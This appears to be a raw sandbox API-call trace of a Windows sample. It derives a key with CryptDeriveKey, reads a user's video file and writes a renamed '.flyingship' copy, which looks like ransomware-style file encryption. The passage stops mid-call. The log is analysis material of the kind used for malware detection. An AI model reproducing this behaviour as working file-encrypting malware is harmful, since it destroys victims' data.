RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0195.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0195.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0195.457] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0195.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0195.460] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0195.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0195.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0195.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0195.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0195.470] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0195.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0195.476] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0195.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0195.479] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0195.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0195.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0195.482] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.490] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0195.761] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0195.762] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0195.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0195.762] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.763] CryptHashData (hHash=0x90ae18, pbData=0x8df0a0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0195.763] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0195.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0195.763] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0195.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0195.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0195.763] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.763] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0195.765] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.765] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0195.765] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.765] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.765] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.765] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0195.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0195.765] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0195.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.765] CryptDestroyHash (hHash=0x90ae18) returned 1 [0195.766] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.766] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.766] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0195.766] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0195.766] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\g9kkkj.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0195.768] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.768] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0195.768] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.768] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0195.768] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.flyingship.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\g9kkkj.flyingship.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0195.771] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.771] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0195.771] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.772] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0195.772] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xab9c, lpOverlapped=0x0) returned 1 [0195.868] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0195.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0195.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0195.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0195.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0195.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xab9c) returned 0xbea018 [0195.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0195.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0195.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0195.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0195.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0195.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0195.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xab9c) returned 0xbf4bc0 [0195.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0195.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0195.870] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0195.870] TranslateMessage (lpMsg=0x87f36c) returned 0 [0195.870] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0195.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0195.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0195.870] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0195.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0195.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0195.871] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0195.871] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0195.872] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0195.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0195.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0195.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0195.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0195.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xab9c) returned 0xbea018 [0195.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0195.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0195.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0195.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0195.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0195.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0195.872] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0195.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0195.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0195.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0195.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0195.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0195.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0195.873] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0195.873] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0195.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0195.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xab9c) returned 0xbea018 [0195.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0195.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0195.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0195.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0195.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0195.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0195.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0195.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0195.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0195.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0195.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0195.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0195.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0195.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0195.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xab9c) returned 0xbff768 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0195.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0195.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0195.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0195.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0195.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0195.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0195.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0195.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0195.876] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0195.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0195.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2808 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0195.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0195.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0195.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0195.877] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0195.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0195.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0195.877] RtlAllocateHeap (HeapHandle=0x8a0000, 